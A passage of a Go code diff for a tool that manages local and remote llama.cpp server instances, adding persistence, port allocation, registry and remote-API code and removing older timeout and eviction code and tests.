Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
inst, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
// Update with new port
newOptions := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8081,
},
},
}
updated, err := mgr.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetPort() != 8081 {
t.Errorf("Expected port 8081, got %d", updated.GetPort())
}
// Old port should be released - try to create new instance with old port
options2 := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080,
},
},
}
_, err = mgr.CreateInstance("test-instance-2", options2)
if err != nil {
t.Errorf("Should be able to use old port 8080: %v", err)
}
}

198
pkg/manager/persistence.go Normal file
View File

@@ -0,0 +1,198 @@
package manager
import (
"encoding/json"
"fmt"
"llamactl/pkg/instance"
"log"
"os"
"path/filepath"
"strings"
"sync"
)
// instancePersister provides atomic file-based persistence with durability guarantees.
type instancePersister struct {
mu sync.Mutex
instancesDir string
}
// newInstancePersister creates a new instance persister.
// If instancesDir is empty, persistence is disabled.
func newInstancePersister(instancesDir string) *instancePersister {
return &instancePersister{
instancesDir: instancesDir,
}
}
// Save persists an instance to disk with atomic write
func (p *instancePersister) save(inst *instance.Instance) error {
if inst == nil {
return fmt.Errorf("cannot save nil instance")
}
// Validate instance name to prevent path traversal
validatedName, err := p.validateInstanceName(inst.Name)
if err != nil {
return err
}
p.mu.Lock()
defer p.mu.Unlock()
instancePath := filepath.Join(p.instancesDir, validatedName+".json")
tempPath := instancePath + ".tmp"
// Serialize instance to JSON
jsonData, err := json.MarshalIndent(inst, "", " ")
if err != nil {
return fmt.Errorf("failed to marshal instance %s: %w", inst.Name, err)
}
// Create temporary file
tempFile, err := os.OpenFile(tempPath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644)
if err != nil {
return fmt.Errorf("failed to create temp file for instance %s: %w", inst.Name, err)
}
// Write data to temporary file
if _, err := tempFile.Write(jsonData); err != nil {
tempFile.Close()
os.Remove(tempPath)
return fmt.Errorf("failed to write temp file for instance %s: %w", inst.Name, err)
}
// Sync to disk before rename to ensure durability
if err := tempFile.Sync(); err != nil {
tempFile.Close()
os.Remove(tempPath)
return fmt.Errorf("failed to sync temp file for instance %s: %w", inst.Name, err)
}
// Close the file
if err := tempFile.Close(); err != nil {
os.Remove(tempPath)
return fmt.Errorf("failed to close temp file for instance %s: %w", inst.Name, err)
}
// Atomic rename (this is atomic on POSIX systems)
if err := os.Rename(tempPath, instancePath); err != nil {
os.Remove(tempPath)
return fmt.Errorf("failed to rename temp file for instance %s: %w", inst.Name, err)
}
return nil
}
// Delete removes an instance's persistence file from disk.
func (p *instancePersister) delete(name string) error {
validatedName, err := p.validateInstanceName(name)
if err != nil {
return err
}
p.mu.Lock()
defer p.mu.Unlock()
instancePath := filepath.Join(p.instancesDir, validatedName+".json")
if err := os.Remove(instancePath); err != nil {
if os.IsNotExist(err) {
// Not an error if file doesn't exist
return nil
}
return fmt.Errorf("failed to delete instance file for %s: %w", name, err)
}
return nil
}
// LoadAll loads all persisted instances from disk.
// Returns a slice of instances and any errors encountered during loading.
func (p *instancePersister) loadAll() ([]*instance.Instance, error) {
p.mu.Lock()
defer p.mu.Unlock()
// Check if instances directory exists
if _, err := os.Stat(p.instancesDir); os.IsNotExist(err) {
return nil, nil // No instances directory, return empty list
}
// Read all JSON files from instances directory
files, err := os.ReadDir(p.instancesDir)
if err != nil {
return nil, fmt.Errorf("failed to read instances directory: %w", err)
}
instances := make([]*instance.Instance, 0)
var loadErrors []string
for _, file := range files {
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
continue
}
instanceName := strings.TrimSuffix(file.Name(), ".json")
instancePath := filepath.Join(p.instancesDir, file.Name())
inst, err := p.loadInstanceFile(instanceName, instancePath)
if err != nil {
log.Printf("Failed to load instance %s: %v", instanceName, err)
loadErrors = append(loadErrors, fmt.Sprintf("%s: %v", instanceName, err))
continue
}
instances = append(instances, inst)
}
if len(loadErrors) > 0 {
log.Printf("Loaded %d instances with %d errors", len(instances), len(loadErrors))
} else if len(instances) > 0 {
log.Printf("Loaded %d instances from persistence", len(instances))
}
return instances, nil
}
// loadInstanceFile is an internal helper that loads a single instance file.
// Note: This assumes the mutex is already held by the caller.
func (p *instancePersister) loadInstanceFile(name, path string) (*instance.Instance, error) {
data, err := os.ReadFile(path)
if err != nil {
return nil, fmt.Errorf("failed to read instance file: %w", err)
}
var inst instance.Instance
if err := json.Unmarshal(data, &inst); err != nil {
return nil, fmt.Errorf("failed to unmarshal instance: %w", err)
}
// Validate the instance name matches the filename
if inst.Name != name {
return nil, fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, inst.Name)
}
return &inst, nil
}
// validateInstanceName ensures the instance name is safe for filesystem operations.
// Returns the validated name if valid, or an error if invalid.
func (p *instancePersister) validateInstanceName(name string) (string, error) {
if name == "" {
return "", fmt.Errorf("instance name cannot be empty")
}
// Check for path separators and parent directory references
// This prevents path traversal attacks
if strings.Contains(name, "/") || strings.Contains(name, "\\") || strings.Contains(name, "..") {
return "", fmt.Errorf("invalid instance name: %s (cannot contain path separators or '..')", name)
}
// Additional check: ensure the name doesn't start with a dot (hidden files)
// or contain any other suspicious characters
if strings.HasPrefix(name, ".") {
return "", fmt.Errorf("invalid instance name: %s (cannot start with '.')", name)
}
return name, nil
}

176
pkg/manager/ports.go Normal file
View File

@@ -0,0 +1,176 @@
package manager
import (
"fmt"
"math/bits"
"sync"
)
// portAllocator provides efficient port allocation using a bitmap for O(1) operations.
// The bitmap approach prevents unbounded memory growth and simplifies port management.
type portAllocator struct {
mu sync.Mutex
// Bitmap for O(1) allocation/release
// Each bit represents a port (1 = allocated, 0 = free)
bitmap []uint64 // Each uint64 covers 64 ports
// Map port to instance name for cleanup operations
allocated map[int]string
minPort int
maxPort int
rangeSize int
}
// newPortAllocator creates a new port allocator for the given port range.
func newPortAllocator(minPort, maxPort int) *portAllocator {
rangeSize := maxPort - minPort + 1
bitmapSize := (rangeSize + 63) / 64 // Round up to nearest uint64
return &portAllocator{
bitmap: make([]uint64, bitmapSize),
allocated: make(map[int]string),
minPort: minPort,
maxPort: maxPort,
rangeSize: rangeSize,
}
}
// allocate finds and allocates the first available port for the given instance.
// Returns the allocated port or an error if no ports are available.
func (p *portAllocator) allocate(instanceName string) (int, error) {
if instanceName == "" {
return 0, fmt.Errorf("instance name cannot be empty")
}
p.mu.Lock()
defer p.mu.Unlock()
port, err := p.findFirstFreeBit()
if err != nil {
return 0, err
}
p.setBit(port)
p.allocated[port] = instanceName
return port, nil
}
// allocateSpecific allocates a specific port for the given instance.
// Returns an error if the port is already allocated or out of range.
func (p *portAllocator) allocateSpecific(port int, instanceName string) error {
if instanceName == "" {
return fmt.Errorf("instance name cannot be empty")
}
if port < p.minPort || port > p.maxPort {
return fmt.Errorf("port %d is out of range [%d-%d]", port, p.minPort, p.maxPort)
}
p.mu.Lock()
defer p.mu.Unlock()
if p.isBitSet(port) {
return fmt.Errorf("port %d is already allocated", port)
}
p.setBit(port)
p.allocated[port] = instanceName
return nil
}
// release releases a specific port, making it available for reuse.
// Returns an error if the port is not allocated.
func (p *portAllocator) release(port int) error {
if port < p.minPort || port > p.maxPort {
return fmt.Errorf("port %d is out of range [%d-%d]", port, p.minPort, p.maxPort)
}
p.mu.Lock()
defer p.mu.Unlock()
if !p.isBitSet(port) {
return fmt.Errorf("port %d is not allocated", port)
}
p.clearBit(port)
delete(p.allocated, port)
return nil
}
// releaseByInstance releases all ports allocated to the given instance.
// This is useful for cleanup when deleting or updating an instance.
// Returns the number of ports released.
func (p *portAllocator) releaseByInstance(instanceName string) int {
if instanceName == "" {
return 0
}
p.mu.Lock()
defer p.mu.Unlock()
portsToRelease := make([]int, 0)
for port, name := range p.allocated {
if name == instanceName {
portsToRelease = append(portsToRelease, port)
}
}
for _, port := range portsToRelease {
p.clearBit(port)
delete(p.allocated, port)
}
return len(portsToRelease)
}
// --- Internal bitmap operations ---
// portToBitPos converts a port number to bitmap array index and bit position.
func (p *portAllocator) portToBitPos(port int) (index int, bit uint) {
offset := port - p.minPort
index = offset / 64
bit = uint(offset % 64)
return
}
// setBit marks a port as allocated in the bitmap.
func (p *portAllocator) setBit(port int) {
index, bit := p.portToBitPos(port)
p.bitmap[index] |= (1 << bit)
}
// clearBit marks a port as free in the bitmap.
func (p *portAllocator) clearBit(port int) {
index, bit := p.portToBitPos(port)
p.bitmap[index] &^= (1 << bit)
}
// isBitSet checks if a port is allocated in the bitmap.
func (p *portAllocator) isBitSet(port int) bool {
index, bit := p.portToBitPos(port)
return (p.bitmap[index] & (1 << bit)) != 0
}
// findFirstFreeBit scans the bitmap to find the first unallocated port.
// Returns the port number or an error if no ports are available.
func (p *portAllocator) findFirstFreeBit() (int, error) {
for i, word := range p.bitmap {
if word != ^uint64(0) { // Not all bits are set (some ports are free)
// Find the first 0 bit in this word
// XOR with all 1s to flip bits, then find first 1 (which was 0)
bit := bits.TrailingZeros64(^word)
port := p.minPort + (i * 64) + bit
// Ensure we don't go beyond maxPort due to bitmap rounding
if port <= p.maxPort {
return port, nil
}
}
}
return 0, fmt.Errorf("no available ports in range [%d-%d]", p.minPort, p.maxPort)
}

121
pkg/manager/registry.go Normal file
View File

@@ -0,0 +1,121 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"sync"
)
// instanceRegistry provides thread-safe storage and lookup of instances
// with running state tracking using lock-free sync.Map for status checks.
type instanceRegistry struct {
mu sync.RWMutex
instances map[string]*instance.Instance
running sync.Map // map[string]struct{} - lock-free for status checks
}
// newInstanceRegistry creates a new instance registry.
func newInstanceRegistry() *instanceRegistry {
return &instanceRegistry{
instances: make(map[string]*instance.Instance),
}
}
// Get retrieves an instance by name.
// Returns the instance and true if found, nil and false otherwise.
func (r *instanceRegistry) get(name string) (*instance.Instance, bool) {
r.mu.RLock()
defer r.mu.RUnlock()
inst, exists := r.instances[name]
return inst, exists
}
// List returns a snapshot copy of all instances to prevent external mutation.
func (r *instanceRegistry) list() []*instance.Instance {
r.mu.RLock()
defer r.mu.RUnlock()
result := make([]*instance.Instance, 0, len(r.instances))
for _, inst := range r.instances {
result = append(result, inst)
}
return result
}
// ListRunning returns a snapshot of all currently running instances.
func (r *instanceRegistry) listRunning() []*instance.Instance {
r.mu.RLock()
defer r.mu.RUnlock()
result := make([]*instance.Instance, 0)
for name, inst := range r.instances {
if _, isRunning := r.running.Load(name); isRunning {
result = append(result, inst)
}
}
return result
}
// Add adds a new instance to the registry.
// Returns an error if an instance with the same name already exists.
func (r *instanceRegistry) add(inst *instance.Instance) error {
if inst == nil {
return fmt.Errorf("cannot add nil instance")
}
r.mu.Lock()
defer r.mu.Unlock()
if _, exists := r.instances[inst.Name]; exists {
return fmt.Errorf("instance %s already exists", inst.Name)
}
r.instances[inst.Name] = inst
// Initialize running state if the instance is running
if inst.IsRunning() {
r.running.Store(inst.Name, struct{}{})
}
return nil
}
// Remove removes an instance from the registry.
// Returns an error if the instance doesn't exist.
func (r *instanceRegistry) remove(name string) error {
r.mu.Lock()
defer r.mu.Unlock()
if _, exists := r.instances[name]; !exists {
return fmt.Errorf("instance %s not found", name)
}
delete(r.instances, name)
r.running.Delete(name)
return nil
}
// MarkRunning marks an instance as running using lock-free sync.Map.
func (r *instanceRegistry) markRunning(name string) {
r.running.Store(name, struct{}{})
}
// MarkStopped marks an instance as stopped using lock-free sync.Map.
func (r *instanceRegistry) markStopped(name string) {
r.running.Delete(name)
}
// IsRunning checks if an instance is running using lock-free sync.Map.
func (r *instanceRegistry) isRunning(name string) bool {
_, isRunning := r.running.Load(name)
return isRunning
}
// Count returns the total number of instances in the registry.
func (r *instanceRegistry) count() int {
r.mu.RLock()
defer r.mu.RUnlock()
return len(r.instances)
}

293
pkg/manager/remote.go Normal file
View File

@@ -0,0 +1,293 @@
package manager
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"net/http"
"net/url"
"sync"
"time"
)
const apiBasePath = "/api/v1/instances/"
// remoteManager handles HTTP operations for remote instances.
type remoteManager struct {
mu sync.RWMutex
client *http.Client
nodeMap map[string]*config.NodeConfig // node name -> node config
instanceToNode map[string]*config.NodeConfig // instance name -> node config
}
// newRemoteManager creates a new remote manager.
func newRemoteManager(nodes map[string]config.NodeConfig, timeout time.Duration) *remoteManager {
if timeout <= 0 {
timeout = 30 * time.Second
}
// Build node config map
nodeMap := make(map[string]*config.NodeConfig)
for name := range nodes {
nodeCopy := nodes[name]
nodeMap[name] = &nodeCopy
}
return &remoteManager{
client: &http.Client{
Timeout: timeout,
},
nodeMap: nodeMap,
instanceToNode: make(map[string]*config.NodeConfig),
}
}
// GetNodeForInstance returns the node configuration for a given instance.
// Returns nil if the instance is not mapped to any node.
func (rm *remoteManager) getNodeForInstance(instanceName string) (*config.NodeConfig, bool) {
rm.mu.RLock()
defer rm.mu.RUnlock()
node, exists := rm.instanceToNode[instanceName]
return node, exists
}
// SetInstanceNode maps an instance to a specific node.
// Returns an error if the node doesn't exist.
func (rm *remoteManager) setInstanceNode(instanceName, nodeName string) error {
rm.mu.Lock()
defer rm.mu.Unlock()
node, exists := rm.nodeMap[nodeName]
if !exists {
return fmt.Errorf("node %s not found", nodeName)
}
rm.instanceToNode[instanceName] = node
return nil
}
// RemoveInstance removes the instance-to-node mapping.
func (rm *remoteManager) removeInstance(instanceName string) {
rm.mu.Lock()
defer rm.mu.Unlock()
delete(rm.instanceToNode, instanceName)
}
// --- HTTP request helpers ---
// makeRemoteRequest creates and executes an HTTP request to a remote node with context support.
func (rm *remoteManager) makeRemoteRequest(ctx context.Context, nodeConfig *config.NodeConfig, method, path string, body any) (*http.Response, error) {
var reqBody io.Reader
if body != nil {
jsonData, err := json.Marshal(body)
if err != nil {
return nil, fmt.Errorf("failed to marshal request body: %w", err)
}
reqBody = bytes.NewBuffer(jsonData)
}
url := fmt.Sprintf("%s%s", nodeConfig.Address, path)
req, err := http.NewRequestWithContext(ctx, method, url, reqBody)
if err != nil {
return nil, fmt.Errorf("failed to create request: %w", err)
}
if body != nil {
req.Header.Set("Content-Type", "application/json")
}
if nodeConfig.APIKey != "" {
req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", nodeConfig.APIKey))
}
resp, err := rm.client.Do(req)
if err != nil {
return nil, fmt.Errorf("failed to execute request: %w", err)
}
return resp, nil
}
// parseRemoteResponse parses an HTTP response and unmarshals the result.
func parseRemoteResponse(resp *http.Response, result any) error {
defer resp.Body.Close()
body, err := io.ReadAll(resp.Body)
if err != nil {
return fmt.Errorf("failed to read response body: %w", err)
}
if resp.StatusCode < 200 || resp.StatusCode >= 300 {
return fmt.Errorf("API request failed with status %d: %s", resp.StatusCode, string(body))
}
if result != nil {
if err := json.Unmarshal(body, result); err != nil {
return fmt.Errorf("failed to unmarshal response: %w", err)
}
}
return nil
}
// --- Remote CRUD operations ---
// createInstance creates a new instance on a remote node.
func (rm *remoteManager) createInstance(ctx context.Context, node *config.NodeConfig, name string, opts *instance.Options) (*instance.Instance, error) {
escapedName := url.PathEscape(name)
path := fmt.Sprintf("%s%s/", apiBasePath, escapedName)
resp, err := rm.makeRemoteRequest(ctx, node, "POST", path, opts)
if err != nil {
return nil, err
}
var inst instance.Instance
if err := parseRemoteResponse(resp, &inst); err != nil {
return nil, err
}
return &inst, nil
}
// getInstance retrieves an instance by name from a remote node.
func (rm *remoteManager) getInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
escapedName := url.PathEscape(name)
path := fmt.Sprintf("%s%s/", apiBasePath, escapedName)
resp, err := rm.makeRemoteRequest(ctx, node, "GET", path, nil)
if err != nil {
return nil, err
}
var inst instance.Instance
if err := parseRemoteResponse(resp, &inst); err != nil {
return nil, err
}
return &inst, nil
}
// updateInstance updates an existing instance on a remote node.
func (rm *remoteManager) updateInstance(ctx context.Context, node *config.NodeConfig, name string, opts *instance.Options) (*instance.Instance, error) {
escapedName := url.PathEscape(name)
path := fmt.Sprintf("%s%s/", apiBasePath, escapedName)
resp, err := rm.makeRemoteRequest(ctx, node, "PUT", path, opts)
if err != nil {
return nil, err
}
var inst instance.Instance
if err := parseRemoteResponse(resp, &inst); err != nil {
return nil, err
}
return &inst, nil
}
// deleteInstance deletes an instance from a remote node.
func (rm *remoteManager) deleteInstance(ctx context.Context, node *config.NodeConfig, name string) error {
escapedName := url.PathEscape(name)
path := fmt.Sprintf("%s%s/", apiBasePath, escapedName)
resp, err := rm.makeRemoteRequest(ctx, node, "DELETE", path, nil)
if err != nil {
return err
}
return parseRemoteResponse(resp, nil)
}
// startInstance starts an instance on a remote node.
func (rm *remoteManager) startInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
escapedName := url.PathEscape(name)
path := fmt.Sprintf("%s%s/start", apiBasePath, escapedName)
resp, err := rm.makeRemoteRequest(ctx, node, "POST", path, nil)
if err != nil {
return nil, err
}
var inst instance.Instance
if err := parseRemoteResponse(resp, &inst); err != nil {
return nil, err
}
return &inst, nil
}
// stopInstance stops an instance on a remote node.
func (rm *remoteManager) stopInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
escapedName := url.PathEscape(name)
path := fmt.Sprintf("%s%s/stop", apiBasePath, escapedName)
resp, err := rm.makeRemoteRequest(ctx, node, "POST", path, nil)
if err != nil {
return nil, err
}
var inst instance.Instance
if err := parseRemoteResponse(resp, &inst); err != nil {
return nil, err
}
return &inst, nil
}
// restartInstance restarts an instance on a remote node.
func (rm *remoteManager) restartInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
escapedName := url.PathEscape(name)
path := fmt.Sprintf("%s%s/restart", apiBasePath, escapedName)
resp, err := rm.makeRemoteRequest(ctx, node, "POST", path, nil)
if err != nil {
return nil, err
}
var inst instance.Instance
if err := parseRemoteResponse(resp, &inst); err != nil {
return nil, err
}
return &inst, nil
}
// getInstanceLogs retrieves logs for an instance from a remote node.
func (rm *remoteManager) getInstanceLogs(ctx context.Context, node *config.NodeConfig, name string, numLines int) (string, error) {
escapedName := url.PathEscape(name)
path := fmt.Sprintf("%s%s/logs?lines=%d", apiBasePath, escapedName, numLines)
resp, err := rm.makeRemoteRequest(ctx, node, "GET", path, nil)
if err != nil {
return "", err
}
defer resp.Body.Close()
body, err := io.ReadAll(resp.Body)
if err != nil {
return "", fmt.Errorf("failed to read response body: %w", err)
}
if resp.StatusCode < 200 || resp.StatusCode >= 300 {
return "", fmt.Errorf("API request failed with status %d: %s", resp.StatusCode, string(body))
}
// Logs endpoint returns plain text (Content-Type: text/plain)
return string(body), nil
}

View File

@@ -1,64 +0,0 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
var timeoutInstances []string
// Identify instances that should timeout
for _, inst := range im.instances {
if inst.ShouldTimeout() {
timeoutInstances = append(timeoutInstances, inst.Name)
}
}
im.mu.RUnlock() // Release read lock before calling StopInstance
// Stop the timed-out instances
for _, name := range timeoutInstances {
log.Printf("Instance %s has timed out, stopping it", name)
if _, err := im.StopInstance(name); err != nil {
log.Printf("Error stopping instance %s: %v", name, err)
} else {
log.Printf("Instance %s stopped successfully", name)
}
}
}
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue // Skip instances without idle timeout
}
if lruInstance == nil {
lruInstance = inst
}
if inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict Instance
_, err := im.StopInstance(lruInstance.Name)
return err
}

View File

@@ -1,332 +0,0 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{Command: "llama-server"},
MLX: config.BackendSettings{Command: "mlx_lm.server"},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(backendConfig, cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually - set all to stopped and then shutdown
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -1,795 +1,115 @@
package server
import (
"bytes"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"llamactl/pkg/validation"
"log"
"net/http"
"os/exec"
"strconv"
"strings"
"time"
"github.com/go-chi/chi/v5"
)
// errorResponse represents an error response returned by the API
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
